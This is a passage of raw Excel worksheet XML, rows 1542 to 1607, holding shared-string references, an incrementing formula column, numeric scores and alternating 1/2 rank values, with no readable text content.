        <v>28.56110763549805</v>
      </c>
      <c r="F1542">
        <v>1</v>
      </c>
    </row>
    <row r="1543" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1543" t="s">
        <v>2971</v>
      </c>
      <c r="B1543" t="s">
        <v>2972</v>
      </c>
      <c r="C1543">
        <f t="shared" si="23"/>
        <v>11362314</v>
      </c>
      <c r="D1543" t="s">
        <v>2974</v>
      </c>
      <c r="E1543">
        <v>1.616499662399292</v>
      </c>
      <c r="F1543">
        <v>2</v>
      </c>
    </row>
    <row r="1544" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1544" t="s">
        <v>2975</v>
      </c>
      <c r="B1544" t="s">
        <v>2976</v>
      </c>
      <c r="C1544">
        <f t="shared" si="23"/>
        <v>11363567</v>
      </c>
      <c r="D1544" t="s">
        <v>2977</v>
      </c>
      <c r="E1544">
        <v>25.379331588745121</v>
      </c>
      <c r="F1544">
        <v>1</v>
      </c>
    </row>
    <row r="1545" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1545" t="s">
        <v>2975</v>
      </c>
      <c r="B1545" t="s">
        <v>2976</v>
      </c>
      <c r="C1545">
        <f t="shared" si="23"/>
        <v>11364820</v>
      </c>
      <c r="D1545" t="s">
        <v>2978</v>
      </c>
      <c r="E1545">
        <v>10.6619987487793</v>
      </c>
      <c r="F1545">
        <v>2</v>
      </c>
    </row>
    <row r="1546" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1546" t="s">
        <v>2979</v>
      </c>
      <c r="B1546" t="s">
        <v>2980</v>
      </c>
      <c r="C1546">
        <f t="shared" ref="C1546:C1609" si="24">C1545+1253</f>
        <v>11366073</v>
      </c>
      <c r="D1546" t="s">
        <v>2981</v>
      </c>
      <c r="E1546">
        <v>7.8912563323974609</v>
      </c>
      <c r="F1546">
        <v>1</v>
      </c>
    </row>
    <row r="1547" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1547" t="s">
        <v>2979</v>
      </c>
      <c r="B1547" t="s">
        <v>2980</v>
      </c>
      <c r="C1547">
        <f t="shared" si="24"/>
        <v>11367326</v>
      </c>
      <c r="D1547" t="s">
        <v>2982</v>
      </c>
      <c r="E1547">
        <v>7.2282490730285636</v>
      </c>
      <c r="F1547">
        <v>2</v>
      </c>
    </row>
    <row r="1548" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1548" t="s">
        <v>2983</v>
      </c>
      <c r="B1548" t="s">
        <v>2984</v>
      </c>
      <c r="C1548">
        <f t="shared" si="24"/>
        <v>11368579</v>
      </c>
      <c r="D1548" t="s">
        <v>2985</v>
      </c>
      <c r="E1548">
        <v>18.49509429931641</v>
      </c>
      <c r="F1548">
        <v>1</v>
      </c>
    </row>
    <row r="1549" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1549" t="s">
        <v>2983</v>
      </c>
      <c r="B1549" t="s">
        <v>2984</v>
      </c>
      <c r="C1549">
        <f t="shared" si="24"/>
        <v>11369832</v>
      </c>
      <c r="D1549" t="s">
        <v>2986</v>
      </c>
      <c r="E1549">
        <v>9.5856752395629883</v>
      </c>
      <c r="F1549">
        <v>2</v>
      </c>
    </row>
    <row r="1550" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1550" t="s">
        <v>2987</v>
      </c>
      <c r="B1550" t="s">
        <v>2988</v>
      </c>
      <c r="C1550">
        <f t="shared" si="24"/>
        <v>11371085</v>
      </c>
      <c r="D1550" t="s">
        <v>2989</v>
      </c>
      <c r="E1550">
        <v>15.693411827087401</v>
      </c>
      <c r="F1550">
        <v>1</v>
      </c>
    </row>
    <row r="1551" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1551" t="s">
        <v>2987</v>
      </c>
      <c r="B1551" t="s">
        <v>2988</v>
      </c>
      <c r="C1551">
        <f t="shared" si="24"/>
        <v>11372338</v>
      </c>
      <c r="D1551" t="s">
        <v>2990</v>
      </c>
      <c r="E1551">
        <v>15.33035850524902</v>
      </c>
      <c r="F1551">
        <v>2</v>
      </c>
    </row>
    <row r="1552" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1552" t="s">
        <v>2991</v>
      </c>
      <c r="B1552" t="s">
        <v>2992</v>
      </c>
      <c r="C1552">
        <f t="shared" si="24"/>
        <v>11373591</v>
      </c>
      <c r="D1552" t="s">
        <v>2993</v>
      </c>
      <c r="E1552">
        <v>23.199628829956051</v>
      </c>
      <c r="F1552">
        <v>1</v>
      </c>
    </row>
    <row r="1553" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1553" t="s">
        <v>2991</v>
      </c>
      <c r="B1553" t="s">
        <v>2992</v>
      </c>
      <c r="C1553">
        <f t="shared" si="24"/>
        <v>11374844</v>
      </c>
      <c r="D1553" t="s">
        <v>2994</v>
      </c>
      <c r="E1553">
        <v>10.76660251617432</v>
      </c>
      <c r="F1553">
        <v>2</v>
      </c>
    </row>
    <row r="1554" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1554" t="s">
        <v>2995</v>
      </c>
      <c r="B1554" t="s">
        <v>2996</v>
      </c>
      <c r="C1554">
        <f t="shared" si="24"/>
        <v>11376097</v>
      </c>
      <c r="D1554" t="s">
        <v>2997</v>
      </c>
      <c r="E1554">
        <v>20.282808303833011</v>
      </c>
      <c r="F1554">
        <v>1</v>
      </c>
    </row>
    <row r="1555" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1555" t="s">
        <v>2995</v>
      </c>
      <c r="B1555" t="s">
        <v>2996</v>
      </c>
      <c r="C1555">
        <f t="shared" si="24"/>
        <v>11377350</v>
      </c>
      <c r="D1555" t="s">
        <v>2998</v>
      </c>
      <c r="E1555">
        <v>9.725499153137207</v>
      </c>
      <c r="F1555">
        <v>2</v>
      </c>
    </row>
    <row r="1556" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1556" t="s">
        <v>2999</v>
      </c>
      <c r="B1556" t="s">
        <v>3000</v>
      </c>
      <c r="C1556">
        <f t="shared" si="24"/>
        <v>11378603</v>
      </c>
      <c r="D1556" t="s">
        <v>403</v>
      </c>
      <c r="E1556">
        <v>31.060941696166989</v>
      </c>
      <c r="F1556">
        <v>1</v>
      </c>
    </row>
    <row r="1557" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1557" t="s">
        <v>2999</v>
      </c>
      <c r="B1557" t="s">
        <v>3000</v>
      </c>
      <c r="C1557">
        <f t="shared" si="24"/>
        <v>11379856</v>
      </c>
      <c r="D1557" t="s">
        <v>3001</v>
      </c>
      <c r="E1557">
        <v>8.9165983200073242</v>
      </c>
      <c r="F1557">
        <v>2</v>
      </c>
    </row>
    <row r="1558" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1558" t="s">
        <v>3002</v>
      </c>
      <c r="B1558" t="s">
        <v>3003</v>
      </c>
      <c r="C1558">
        <f t="shared" si="24"/>
        <v>11381109</v>
      </c>
      <c r="D1558" t="s">
        <v>3004</v>
      </c>
      <c r="E1558">
        <v>32.661376953125</v>
      </c>
      <c r="F1558">
        <v>1</v>
      </c>
    </row>
    <row r="1559" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1559" t="s">
        <v>3002</v>
      </c>
      <c r="B1559" t="s">
        <v>3003</v>
      </c>
      <c r="C1559">
        <f t="shared" si="24"/>
        <v>11382362</v>
      </c>
      <c r="D1559" t="s">
        <v>3005</v>
      </c>
      <c r="E1559">
        <v>3.7421038150787349</v>
      </c>
      <c r="F1559">
        <v>2</v>
      </c>
    </row>
    <row r="1560" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1560" t="s">
        <v>3006</v>
      </c>
      <c r="B1560" t="s">
        <v>3007</v>
      </c>
      <c r="C1560">
        <f t="shared" si="24"/>
        <v>11383615</v>
      </c>
      <c r="D1560" t="s">
        <v>3008</v>
      </c>
      <c r="E1560">
        <v>31.504304885864261</v>
      </c>
      <c r="F1560">
        <v>1</v>
      </c>
    </row>
    <row r="1561" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1561" t="s">
        <v>3006</v>
      </c>
      <c r="B1561" t="s">
        <v>3007</v>
      </c>
      <c r="C1561">
        <f t="shared" si="24"/>
        <v>11384868</v>
      </c>
      <c r="D1561" t="s">
        <v>3009</v>
      </c>
      <c r="E1561">
        <v>14.493119239807131</v>
      </c>
      <c r="F1561">
        <v>2</v>
      </c>
    </row>
    <row r="1562" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1562" t="s">
        <v>3010</v>
      </c>
      <c r="B1562" t="s">
        <v>3011</v>
      </c>
      <c r="C1562">
        <f t="shared" si="24"/>
        <v>11386121</v>
      </c>
      <c r="D1562" t="s">
        <v>3012</v>
      </c>
      <c r="E1562">
        <v>20.903932571411129</v>
      </c>
      <c r="F1562">
        <v>1</v>
      </c>
    </row>
    <row r="1563" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1563" t="s">
        <v>3010</v>
      </c>
      <c r="B1563" t="s">
        <v>3011</v>
      </c>
      <c r="C1563">
        <f t="shared" si="24"/>
        <v>11387374</v>
      </c>
      <c r="D1563" t="s">
        <v>3013</v>
      </c>
      <c r="E1563">
        <v>3.8930070400238042</v>
      </c>
      <c r="F1563">
        <v>2</v>
      </c>
    </row>
    <row r="1564" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1564" t="s">
        <v>3014</v>
      </c>
      <c r="B1564" t="s">
        <v>3015</v>
      </c>
      <c r="C1564">
        <f t="shared" si="24"/>
        <v>11388627</v>
      </c>
      <c r="D1564" t="s">
        <v>3016</v>
      </c>
      <c r="E1564">
        <v>19.85915374755859</v>
      </c>
      <c r="F1564">
        <v>1</v>
      </c>
    </row>
    <row r="1565" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1565" t="s">
        <v>3014</v>
      </c>
      <c r="B1565" t="s">
        <v>3015</v>
      </c>
      <c r="C1565">
        <f t="shared" si="24"/>
        <v>11389880</v>
      </c>
      <c r="D1565" t="s">
        <v>3017</v>
      </c>
      <c r="E1565">
        <v>7.8351802825927734</v>
      </c>
      <c r="F1565">
        <v>2</v>
      </c>
    </row>
    <row r="1566" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1566" t="s">
        <v>3018</v>
      </c>
      <c r="B1566" t="s">
        <v>3019</v>
      </c>
      <c r="C1566">
        <f t="shared" si="24"/>
        <v>11391133</v>
      </c>
      <c r="D1566" t="s">
        <v>3020</v>
      </c>
      <c r="E1566">
        <v>21.869586944580082</v>
      </c>
      <c r="F1566">
        <v>1</v>
      </c>
    </row>
    <row r="1567" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1567" t="s">
        <v>3018</v>
      </c>
      <c r="B1567" t="s">
        <v>3019</v>
      </c>
      <c r="C1567">
        <f t="shared" si="24"/>
        <v>11392386</v>
      </c>
      <c r="D1567" t="s">
        <v>3021</v>
      </c>
      <c r="E1567">
        <v>15.1651725769043</v>
      </c>
      <c r="F1567">
        <v>2</v>
      </c>
    </row>
    <row r="1568" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1568" t="s">
        <v>3022</v>
      </c>
      <c r="B1568" t="s">
        <v>3015</v>
      </c>
      <c r="C1568">
        <f t="shared" si="24"/>
        <v>11393639</v>
      </c>
      <c r="D1568" t="s">
        <v>3016</v>
      </c>
      <c r="E1568">
        <v>19.803779602050781</v>
      </c>
      <c r="F1568">
        <v>1</v>
      </c>
    </row>
    <row r="1569" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1569" t="s">
        <v>3022</v>
      </c>
      <c r="B1569" t="s">
        <v>3015</v>
      </c>
      <c r="C1569">
        <f t="shared" si="24"/>
        <v>11394892</v>
      </c>
      <c r="D1569" t="s">
        <v>3023</v>
      </c>
      <c r="E1569">
        <v>10.780592918396</v>
      </c>
      <c r="F1569">
        <v>2</v>
      </c>
    </row>
    <row r="1570" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1570" t="s">
        <v>3024</v>
      </c>
      <c r="B1570" t="s">
        <v>3025</v>
      </c>
      <c r="C1570">
        <f t="shared" si="24"/>
        <v>11396145</v>
      </c>
      <c r="D1570" t="s">
        <v>3026</v>
      </c>
      <c r="E1570">
        <v>39.491939544677727</v>
      </c>
      <c r="F1570">
        <v>1</v>
      </c>
    </row>
    <row r="1571" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1571" t="s">
        <v>3024</v>
      </c>
      <c r="B1571" t="s">
        <v>3025</v>
      </c>
      <c r="C1571">
        <f t="shared" si="24"/>
        <v>11397398</v>
      </c>
      <c r="D1571" t="s">
        <v>3027</v>
      </c>
      <c r="E1571">
        <v>2.5090117454528809</v>
      </c>
      <c r="F1571">
        <v>2</v>
      </c>
    </row>
    <row r="1572" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1572" t="s">
        <v>3028</v>
      </c>
      <c r="B1572" t="s">
        <v>3029</v>
      </c>
      <c r="C1572">
        <f t="shared" si="24"/>
        <v>11398651</v>
      </c>
      <c r="D1572" t="s">
        <v>3030</v>
      </c>
      <c r="E1572">
        <v>15.870378494262701</v>
      </c>
      <c r="F1572">
        <v>1</v>
      </c>
    </row>
    <row r="1573" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1573" t="s">
        <v>3028</v>
      </c>
      <c r="B1573" t="s">
        <v>3029</v>
      </c>
      <c r="C1573">
        <f t="shared" si="24"/>
        <v>11399904</v>
      </c>
      <c r="D1573" t="s">
        <v>3031</v>
      </c>
      <c r="E1573">
        <v>0.80737859010696411</v>
      </c>
      <c r="F1573">
        <v>2</v>
      </c>
    </row>
    <row r="1574" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1574" t="s">
        <v>3032</v>
      </c>
      <c r="B1574" t="s">
        <v>3033</v>
      </c>
      <c r="C1574">
        <f t="shared" si="24"/>
        <v>11401157</v>
      </c>
      <c r="D1574" t="s">
        <v>3034</v>
      </c>
      <c r="E1574">
        <v>25.826412200927731</v>
      </c>
      <c r="F1574">
        <v>1</v>
      </c>
    </row>
    <row r="1575" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1575" t="s">
        <v>3032</v>
      </c>
      <c r="B1575" t="s">
        <v>3033</v>
      </c>
      <c r="C1575">
        <f t="shared" si="24"/>
        <v>11402410</v>
      </c>
      <c r="D1575" t="s">
        <v>3035</v>
      </c>
      <c r="E1575">
        <v>8.527491569519043</v>
      </c>
      <c r="F1575">
        <v>2</v>
      </c>
    </row>
    <row r="1576" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1576" t="s">
        <v>3036</v>
      </c>
      <c r="B1576" t="s">
        <v>3037</v>
      </c>
      <c r="C1576">
        <f t="shared" si="24"/>
        <v>11403663</v>
      </c>
      <c r="D1576" t="s">
        <v>3038</v>
      </c>
      <c r="E1576">
        <v>23.986099243164059</v>
      </c>
      <c r="F1576">
        <v>1</v>
      </c>
    </row>
    <row r="1577" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1577" t="s">
        <v>3036</v>
      </c>
      <c r="B1577" t="s">
        <v>3037</v>
      </c>
      <c r="C1577">
        <f t="shared" si="24"/>
        <v>11404916</v>
      </c>
      <c r="D1577" t="s">
        <v>3039</v>
      </c>
      <c r="E1577">
        <v>4.6265363693237296</v>
      </c>
      <c r="F1577">
        <v>2</v>
      </c>
    </row>
    <row r="1578" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1578" t="s">
        <v>3040</v>
      </c>
      <c r="B1578" t="s">
        <v>3041</v>
      </c>
      <c r="C1578">
        <f t="shared" si="24"/>
        <v>11406169</v>
      </c>
      <c r="D1578" t="s">
        <v>1721</v>
      </c>
      <c r="E1578">
        <v>23.625619888305661</v>
      </c>
      <c r="F1578">
        <v>1</v>
      </c>
    </row>
    <row r="1579" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1579" t="s">
        <v>3040</v>
      </c>
      <c r="B1579" t="s">
        <v>3041</v>
      </c>
      <c r="C1579">
        <f t="shared" si="24"/>
        <v>11407422</v>
      </c>
      <c r="D1579" t="s">
        <v>3042</v>
      </c>
      <c r="E1579">
        <v>4.8236637115478516</v>
      </c>
      <c r="F1579">
        <v>2</v>
      </c>
    </row>
    <row r="1580" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1580" t="s">
        <v>3043</v>
      </c>
      <c r="B1580" t="s">
        <v>3044</v>
      </c>
      <c r="C1580">
        <f t="shared" si="24"/>
        <v>11408675</v>
      </c>
      <c r="D1580" t="s">
        <v>3045</v>
      </c>
      <c r="E1580">
        <v>34.82763671875</v>
      </c>
      <c r="F1580">
        <v>1</v>
      </c>
    </row>
    <row r="1581" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1581" t="s">
        <v>3043</v>
      </c>
      <c r="B1581" t="s">
        <v>3044</v>
      </c>
      <c r="C1581">
        <f t="shared" si="24"/>
        <v>11409928</v>
      </c>
      <c r="D1581" t="s">
        <v>3046</v>
      </c>
      <c r="E1581">
        <v>0.2100520133972168</v>
      </c>
      <c r="F1581">
        <v>2</v>
      </c>
    </row>
    <row r="1582" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1582" t="s">
        <v>3047</v>
      </c>
      <c r="B1582" t="s">
        <v>3048</v>
      </c>
      <c r="C1582">
        <f t="shared" si="24"/>
        <v>11411181</v>
      </c>
      <c r="D1582" t="s">
        <v>3049</v>
      </c>
      <c r="E1582">
        <v>25.27219390869141</v>
      </c>
      <c r="F1582">
        <v>1</v>
      </c>
    </row>
    <row r="1583" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1583" t="s">
        <v>3047</v>
      </c>
      <c r="B1583" t="s">
        <v>3048</v>
      </c>
      <c r="C1583">
        <f t="shared" si="24"/>
        <v>11412434</v>
      </c>
      <c r="D1583" t="s">
        <v>3050</v>
      </c>
      <c r="E1583">
        <v>4.3006796836853027</v>
      </c>
      <c r="F1583">
        <v>2</v>
      </c>
    </row>
    <row r="1584" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1584" t="s">
        <v>3051</v>
      </c>
      <c r="B1584" t="s">
        <v>3052</v>
      </c>
      <c r="C1584">
        <f t="shared" si="24"/>
        <v>11413687</v>
      </c>
      <c r="D1584" t="s">
        <v>3053</v>
      </c>
      <c r="E1584">
        <v>31.511480331420898</v>
      </c>
      <c r="F1584">
        <v>1</v>
      </c>
    </row>
    <row r="1585" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1585" t="s">
        <v>3051</v>
      </c>
      <c r="B1585" t="s">
        <v>3052</v>
      </c>
      <c r="C1585">
        <f t="shared" si="24"/>
        <v>11414940</v>
      </c>
      <c r="D1585" t="s">
        <v>3054</v>
      </c>
      <c r="E1585">
        <v>6.3535122871398926</v>
      </c>
      <c r="F1585">
        <v>2</v>
      </c>
    </row>
    <row r="1586" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1586" t="s">
        <v>3055</v>
      </c>
      <c r="B1586" t="s">
        <v>3056</v>
      </c>
      <c r="C1586">
        <f t="shared" si="24"/>
        <v>11416193</v>
      </c>
      <c r="D1586" t="s">
        <v>3057</v>
      </c>
      <c r="E1586">
        <v>9.9614992141723633</v>
      </c>
      <c r="F1586">
        <v>1</v>
      </c>
    </row>
    <row r="1587" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1587" t="s">
        <v>3055</v>
      </c>
      <c r="B1587" t="s">
        <v>3056</v>
      </c>
      <c r="C1587">
        <f t="shared" si="24"/>
        <v>11417446</v>
      </c>
      <c r="D1587" t="s">
        <v>3058</v>
      </c>
      <c r="E1587">
        <v>9.2946023941040039</v>
      </c>
      <c r="F1587">
        <v>2</v>
      </c>
    </row>
    <row r="1588" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1588" t="s">
        <v>3059</v>
      </c>
      <c r="B1588" t="s">
        <v>3060</v>
      </c>
      <c r="C1588">
        <f t="shared" si="24"/>
        <v>11418699</v>
      </c>
      <c r="D1588" t="s">
        <v>3061</v>
      </c>
      <c r="E1588">
        <v>23.87137413024902</v>
      </c>
      <c r="F1588">
        <v>1</v>
      </c>
    </row>
    <row r="1589" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1589" t="s">
        <v>3059</v>
      </c>
      <c r="B1589" t="s">
        <v>3060</v>
      </c>
      <c r="C1589">
        <f t="shared" si="24"/>
        <v>11419952</v>
      </c>
      <c r="D1589" t="s">
        <v>3062</v>
      </c>
      <c r="E1589">
        <v>6.635617733001709</v>
      </c>
      <c r="F1589">
        <v>2</v>
      </c>
    </row>
    <row r="1590" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1590" t="s">
        <v>3063</v>
      </c>
      <c r="B1590" t="s">
        <v>3064</v>
      </c>
      <c r="C1590">
        <f t="shared" si="24"/>
        <v>11421205</v>
      </c>
      <c r="D1590" t="s">
        <v>3065</v>
      </c>
      <c r="E1590">
        <v>25.607049942016602</v>
      </c>
      <c r="F1590">
        <v>1</v>
      </c>
    </row>
    <row r="1591" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1591" t="s">
        <v>3063</v>
      </c>
      <c r="B1591" t="s">
        <v>3064</v>
      </c>
      <c r="C1591">
        <f t="shared" si="24"/>
        <v>11422458</v>
      </c>
      <c r="D1591" t="s">
        <v>3066</v>
      </c>
      <c r="E1591">
        <v>6.2932252883911133</v>
      </c>
      <c r="F1591">
        <v>2</v>
      </c>
    </row>
    <row r="1592" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1592" t="s">
        <v>3067</v>
      </c>
      <c r="B1592" t="s">
        <v>3068</v>
      </c>
      <c r="C1592">
        <f t="shared" si="24"/>
        <v>11423711</v>
      </c>
      <c r="D1592" t="s">
        <v>3069</v>
      </c>
      <c r="E1592">
        <v>13.511421203613279</v>
      </c>
      <c r="F1592">
        <v>1</v>
      </c>
    </row>
    <row r="1593" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1593" t="s">
        <v>3067</v>
      </c>
      <c r="B1593" t="s">
        <v>3068</v>
      </c>
      <c r="C1593">
        <f t="shared" si="24"/>
        <v>11424964</v>
      </c>
      <c r="D1593" t="s">
        <v>3070</v>
      </c>
      <c r="E1593">
        <v>4.7209944725036621</v>
      </c>
      <c r="F1593">
        <v>2</v>
      </c>
    </row>
    <row r="1594" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1594" t="s">
        <v>3071</v>
      </c>
      <c r="B1594" t="s">
        <v>3072</v>
      </c>
      <c r="C1594">
        <f t="shared" si="24"/>
        <v>11426217</v>
      </c>
      <c r="D1594" t="s">
        <v>1890</v>
      </c>
      <c r="E1594">
        <v>31.752029418945309</v>
      </c>
      <c r="F1594">
        <v>1</v>
      </c>
    </row>
    <row r="1595" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1595" t="s">
        <v>3071</v>
      </c>
      <c r="B1595" t="s">
        <v>3072</v>
      </c>
      <c r="C1595">
        <f t="shared" si="24"/>
        <v>11427470</v>
      </c>
      <c r="D1595" t="s">
        <v>3073</v>
      </c>
      <c r="E1595">
        <v>6.098665714263916</v>
      </c>
      <c r="F1595">
        <v>2</v>
      </c>
    </row>
    <row r="1596" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1596" t="s">
        <v>3074</v>
      </c>
      <c r="B1596" t="s">
        <v>3075</v>
      </c>
      <c r="C1596">
        <f t="shared" si="24"/>
        <v>11428723</v>
      </c>
      <c r="D1596" t="s">
        <v>3076</v>
      </c>
      <c r="E1596">
        <v>29.205902099609379</v>
      </c>
      <c r="F1596">
        <v>1</v>
      </c>
    </row>
    <row r="1597" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1597" t="s">
        <v>3074</v>
      </c>
      <c r="B1597" t="s">
        <v>3075</v>
      </c>
      <c r="C1597">
        <f t="shared" si="24"/>
        <v>11429976</v>
      </c>
      <c r="D1597" t="s">
        <v>3077</v>
      </c>
      <c r="E1597">
        <v>3.184547901153564</v>
      </c>
      <c r="F1597">
        <v>2</v>
      </c>
    </row>
    <row r="1598" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1598" t="s">
        <v>3078</v>
      </c>
      <c r="B1598" t="s">
        <v>3079</v>
      </c>
      <c r="C1598">
        <f t="shared" si="24"/>
        <v>11431229</v>
      </c>
      <c r="D1598" t="s">
        <v>3080</v>
      </c>
      <c r="E1598">
        <v>26.443607330322269</v>
      </c>
      <c r="F1598">
        <v>1</v>
      </c>
    </row>
    <row r="1599" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1599" t="s">
        <v>3078</v>
      </c>
      <c r="B1599" t="s">
        <v>3079</v>
      </c>
      <c r="C1599">
        <f t="shared" si="24"/>
        <v>11432482</v>
      </c>
      <c r="D1599" t="s">
        <v>3081</v>
      </c>
      <c r="E1599">
        <v>11.030160903930661</v>
      </c>
      <c r="F1599">
        <v>2</v>
      </c>
    </row>
    <row r="1600" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1600" t="s">
        <v>3082</v>
      </c>
      <c r="B1600" t="s">
        <v>3083</v>
      </c>
      <c r="C1600">
        <f t="shared" si="24"/>
        <v>11433735</v>
      </c>
      <c r="D1600" t="s">
        <v>3084</v>
      </c>
      <c r="E1600">
        <v>33.177585601806641</v>
      </c>
      <c r="F1600">
        <v>1</v>
      </c>
    </row>
    <row r="1601" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1601" t="s">
        <v>3082</v>
      </c>
      <c r="B1601" t="s">
        <v>3083</v>
      </c>
      <c r="C1601">
        <f t="shared" si="24"/>
        <v>11434988</v>
      </c>
      <c r="D1601" t="s">
        <v>3085</v>
      </c>
      <c r="E1601">
        <v>7.6105690002441406</v>
      </c>
      <c r="F1601">
        <v>2</v>
      </c>
    </row>
    <row r="1602" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1602" t="s">
        <v>3086</v>
      </c>
      <c r="B1602" t="s">
        <v>3087</v>
      </c>
      <c r="C1602">
        <f t="shared" si="24"/>
        <v>11436241</v>
      </c>
      <c r="D1602" t="s">
        <v>3088</v>
      </c>
      <c r="E1602">
        <v>32.999408721923828</v>
      </c>
      <c r="F1602">
        <v>1</v>
      </c>
    </row>
    <row r="1603" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1603" t="s">
        <v>3086</v>
      </c>
      <c r="B1603" t="s">
        <v>3087</v>
      </c>
      <c r="C1603">
        <f t="shared" si="24"/>
        <v>11437494</v>
      </c>
      <c r="D1603" t="s">
        <v>3089</v>
      </c>
      <c r="E1603">
        <v>10.906265258789061</v>
      </c>
      <c r="F1603">
        <v>2</v>
      </c>
    </row>
    <row r="1604" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1604" t="s">
        <v>3090</v>
      </c>
      <c r="B1604" t="s">
        <v>3091</v>
      </c>
      <c r="C1604">
        <f t="shared" si="24"/>
        <v>11438747</v>
      </c>
      <c r="D1604" t="s">
        <v>3092</v>
      </c>
      <c r="E1604">
        <v>20.884006500244141</v>
      </c>
      <c r="F1604">
        <v>1</v>
      </c>
    </row>
    <row r="1605" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1605" t="s">
        <v>3090</v>
      </c>
      <c r="B1605" t="s">
        <v>3091</v>
      </c>
      <c r="C1605">
        <f t="shared" si="24"/>
        <v>11440000</v>
      </c>
      <c r="D1605" t="s">
        <v>3093</v>
      </c>
      <c r="E1605">
        <v>4.1439187043579302E-5</v>
      </c>
      <c r="F1605">
        <v>2</v>
      </c>
    </row>
    <row r="1606" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1606" t="s">
        <v>3094</v>
      </c>
      <c r="B1606" t="s">
        <v>3095</v>
      </c>
      <c r="C1606">
        <f t="shared" si="24"/>
        <v>11441253</v>
      </c>
      <c r="D1606" t="s">
        <v>3096</v>
      </c>
      <c r="E1606">
        <v>31.987825393676761</v>
      </c>
      <c r="F1606">
        <v>1</v>
      </c>
    </row>
    <row r="1607" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1607" t="s">
        <v>3094</v>
      </c>
      <c r="B1607" t="s">
        <v>3095</v>
      </c>
      <c r="C1607">
        <f t="shared" si="24"/>
        <v>11442506</v>
      </c>
      <c r="D1607" t="s">
        <v>3097</v>
      </c>
      <c r="E1607">
